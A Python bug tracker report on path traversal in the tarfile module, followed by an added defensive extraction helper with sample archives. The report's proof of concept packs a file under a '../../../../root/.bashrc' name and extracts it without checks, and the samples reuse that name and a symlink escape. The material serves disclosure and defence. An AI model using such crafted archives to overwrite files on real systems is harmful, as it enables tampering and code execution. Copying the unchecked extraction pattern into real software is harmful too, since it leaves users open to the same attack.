New submission from daji ma <xiongpa...@gmail.com>:
tarfile is missing cross-directory checking, like ../ or ..\; this potentially causes cross-directory decompression. The exp:

# -*- coding: utf-8 -*-
import tarfile


def extract_tar(file_path, dest_path):
    # Extracts every member with no check on its name: a name containing
    # '../' is joined onto dest_path as-is and is written outside it.
    try:
        with tarfile.open(file_path, 'r') as src_file:
            for info in src_file.getmembers():
                src_file.extract(info.name, dest_path)
        return True
    except (IOError, OSError, tarfile.TarError):
        return False


def make_tar():
    # Stores the local file 'bashrc' under a traversing archive name
    # (tarfile strips the leading '/', leaving '../../../../root/.bashrc').
    tar_file = tarfile.open('x.tar.gz', 'w:gz')
    tar_file.add('bashrc', '/../../../../root/.bashrc')
    tar_file.list(verbose=True)
    tar_file.close()


if __name__ == '__main__':
    make_tar()
    extract_tar('x.tar.gz', 'xx')

----------
components: Library (Lib)
messages: 401631
nosy: xiongpanju
priority: normal
severity: normal
status: open
title: tarfile missing cross-directory checking
type: security
versions: Python 3.8

_______________________________________
Python tracker <rep...@bugs.python.org>
<https://bugs.python.org/issue45170>
_______________________________________
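A defensive counterpart to the report above, added here as an example and not code from the tracker, the reporter or CPython: before anything is written, it resolves every member's path (and, for symlinks and hardlinks, the link target) against the destination directory and refuses the whole archive if any member would land outside it, so the '../../../../root/.bashrc' name from the report is rejected. The helper names (is_within_directory, unsafe_members, safe_extract, build_tar, demo) and the three in-memory sample archives are constructed for this example.

```python
# Added example (not the tracker's or CPython's own code): reject tar
# members whose path, or link target, would resolve outside the destination.
import io
import os
import tarfile
import tempfile


def is_within_directory(base_dir, target_path):
    """True if target_path, fully resolved, lies inside base_dir."""
    abs_base = os.path.realpath(base_dir)
    abs_target = os.path.realpath(target_path)
    return os.path.commonpath([abs_base, abs_target]) == abs_base


def unsafe_members(tar, dest_path):
    """Names of members that would write or link outside dest_path.

    Checks the member path itself and, for links, the link target: a
    symlink pointing above the tree is as dangerous as '../' in a name,
    because a later member could be written through it.
    """
    bad = []
    for info in tar.getmembers():
        target = os.path.join(dest_path, info.name)
        if not is_within_directory(dest_path, target):
            bad.append(info.name)
            continue
        if info.issym():
            # symlink targets are relative to the link's own directory
            link_target = os.path.join(os.path.dirname(target), info.linkname)
        elif info.islnk():
            # hardlink targets are relative to the archive root
            link_target = os.path.join(dest_path, info.linkname)
        else:
            continue
        if not is_within_directory(dest_path, link_target):
            bad.append(info.name)
    return bad


def safe_extract(tar_bytes, dest_path):
    """Extract an in-memory archive only if every member stays in dest_path."""
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:*") as tar:
        bad = unsafe_members(tar, dest_path)
        if bad:
            raise ValueError(f"archive members escape destination: {bad}")
        # Python 3.12+ (and its backports) ship tarfile.data_filter, which
        # enforces the same rules inside extractall; use it when present.
        kwargs = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}
        tar.extractall(dest_path, **kwargs)


def build_tar(members):
    """Constructed sample archive from (name, data, linkname) tuples."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, data, linkname in members:
            info = tarfile.TarInfo(name=name)
            if linkname is not None:
                info.type = tarfile.SYMTYPE
                info.linkname = linkname
                tar.addfile(info)
            else:
                info.size = len(data)
                tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


# Constructed samples: one benign, one carrying the report's '../' name,
# one whose symlink points above the destination.
BENIGN = build_tar([("docs/readme.txt", b"hello\n", None)])
TRAVERSAL = build_tar([("../../../../root/.bashrc", b"# evil\n", None)])
SYMLINK_ESCAPE = build_tar([("escape", b"", "../../outside")])


def demo():
    """Run the samples through safe_extract in a scratch directory."""
    results = {}
    with tempfile.TemporaryDirectory() as dest:
        for label, blob in (("benign", BENIGN), ("traversal", TRAVERSAL),
                            ("symlink", SYMLINK_ESCAPE)):
            try:
                safe_extract(blob, dest)
                results[label] = "extracted"
            except ValueError:
                results[label] = "rejected"
        results["benign_written"] = os.path.isfile(
            os.path.join(dest, "docs", "readme.txt"))
    return results


if __name__ == "__main__":
    print(demo())
```

Run as a script to see the verdicts for the three samples. The check runs over the complete member list before a single file is written, which is what makes the symlink case safe: extracting member by member and checking each path as it goes would still let an earlier symlink redirect a later write. Python 3.12 added the filter argument to extractall (with tarfile.data_filter) to do this inside the library; the manual check above covers the 3.8 version the report names.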